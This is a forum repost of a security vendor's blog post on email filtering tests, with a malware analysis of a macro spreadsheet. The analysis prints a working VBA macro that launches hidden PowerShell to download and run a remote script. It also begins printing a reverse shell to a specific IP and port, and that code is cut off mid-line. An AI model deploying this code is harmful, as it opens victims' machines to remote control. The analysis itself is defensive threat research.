National Cyber Warfare Foundation (NCWF)

Highlight of an Email Attack Simulation Bypass


0 user ratings
2023-08-20 15:52:00
milo
Blue Team (CND)

 - archive -- 

In today's cybersecurity landscape, continuously testing and validating email security against evolving threats is important. Through The Trystero Project, we measure the effectiveness of the leading cloud email providers, Google and Microsoft, in dealing with real-world malware threats. Our analysis reveals the threats that manage to bypass their defenses, highlighting the need for continuous improvement in email security measures.


The post Highlight of an Email Attack Simulation Bypass appeared first on InQuest.



Overview





How effective is your email security stack against the constantly shifting threat landscape? To best answer this question, you must continuously measure and validate the efficacy of your defenses against the latest threats facing the users your organization defends.





History





InQuest came to fruition in 2013 as a network sensor platform built by SOC analysts at the Pentagon who were looking to close the end-user security gap left behind by other best-of-breed solutions. Our focus started on the threat sequence to prevent email and web-borne threats from reaching enterprise users, ultimately preventing attackers from gaining an inside foothold.





In 2021, as we looked to expand our purview to the cloud, we went back to our roots and asked ourselves, “Where’s the new gap?” Thus an experiment was born The Trystero Project.





The process for this effort is simple and straightforward:






  1. We harvest real-world malware from the wild and loop it through the two most popular cloud email providers, Google and Microsoft. We do this with various levels of security enabled or disabled that each provider has available by default.




  2. We then monitor which of those samples makes it through the security gauntlets the providers have created.




  3. The samples that do make it into our instrumented mailboxes are then captured and analyzed, with results being stored and shared publicly with the world.





Generally, there is a 10-20% miss rate for Google and a 5-10% miss rate for Microsoft (with the highest level of protection enabled.) This is a measurable gap that we’ve been tracking for years and results in a back-and-forth battle between the two providers. If you’re curious to track this ongoing competition, subscribe to our newsletter, which covers industry news and tools as well as a monthly performance recap of Google and Microsoft:





April 2023 results



In April alone, we harvested 444 samples capable of bypassing either Microsoft or Google. Of those, Microsoft missed 182 (41%) and Google missed 212 (48%). These real-world samples require additional security measures to ensure they cannot reach your user’s inbox.





This methodology not only produces insight into the ongoing efficacy of these default security stacks, but it also gives us a good idea of the relationship that the threat actors have as they find and deploy evasions or bypasses for detection. We offer this as a complimentary service which we call our Email Attack Simulation (EAS). EAS can identify the gaps in your email security stack to help fortify your defenses. When coupled with follow-up testing, this capability can trace and highlight voids across your major vulnerability vectors of email to an endpoint.





Curious about how your email provider performs? Try the Email Attack Simulation for yourself. Free for the first 30 days, simply create an email address with a forwarding rule and we will:





1. Show you the real-world threats that can reach user inboxes
2. Point you to the industry blogs that cover the threats you missed 3. Recommend the endpoint products to close that gap





Nothing to install. No permissions to grant. No privacy or GDPR concerns.








Sample Highlight





Let’s take a look at an interesting sample that flowed through our Email Attack Simulator on May 25th. A Microsoft Office Spreadsheet containing coercive instructions designed to entice the target user into activating the embedded VBA macro. Sometimes these instructions are embedded within images, other times, like here, it’s written out plainly:








Both InQuest heuristics and machine learning models detected this sample as malicious with high confidence:








So did a large number of AV vendors, 19 of them on the initial scan on May 25th and 33 on the second scan on May 26th.








It’s quite typical for sample detection to improve over time as there is heavy sharing among the community.








The intent of the VBA macro is rather blatant, a partially obfuscated call to a remote Powershell script hosted on Microsoft-owned Github:





Sub Workbook_Open()

Set WshShell = CreateObject("WScript.Shell")
Dim x As String

x = "powershell.exe -WindowStyle hidden -noprofile (power''sh''ell.ex''e {$d = ((Invok''e-Web''Requ''est https://raw.githubusercontent.com/azdakc/gasd/main/jdsin.txt).Content); power''she''ll''.ex''e -execu''tionpol''icy bypa''ss -ec $d})"


Set WshShellExec = WshShell.Exec(x)
MsgBox("This File is not compatible with this computer architecture x64. Please contact the owner of this File")

End Sub




We can see this IOC is automatically extracted via InQuest Deep File Inspection™ (DFI), directly on the InQuest Labs site above:








The hosting Github account and repository were both created on May 22nd:








After decoding and deobfuscating jdsin.txt, we see the following two script bodies. This script establishes a TCP connection to the IP address 149.100.157[.]219 on port 4443. It reads commands sent over the network and executes them using Invoke-Expression (iex). The output of the executed commands is sent back over the network. Finally, the TCP connection is closed. The code is set to run in a hidden window using -WindowStyle hidden.





Start-Process $PSHOME\powershell.exe -ArgumentList {
$tcpClient = New-Object System.Net.Sockets.TCPClient('149.100.157.219', 4443)
$stream = $tcpClient.GetStream()
[byte[

Source: Inquest
Source Link: https://inquest.net/blog/highlight-email-attack-simulation-bypass/


Comments
new comment
Nobody has commented yet. Will you be the first?
 
Forum
Blue Team (CND)



Copyright 2012 through 2024 - National Cyber Warfare Foundation - All rights reserved worldwide.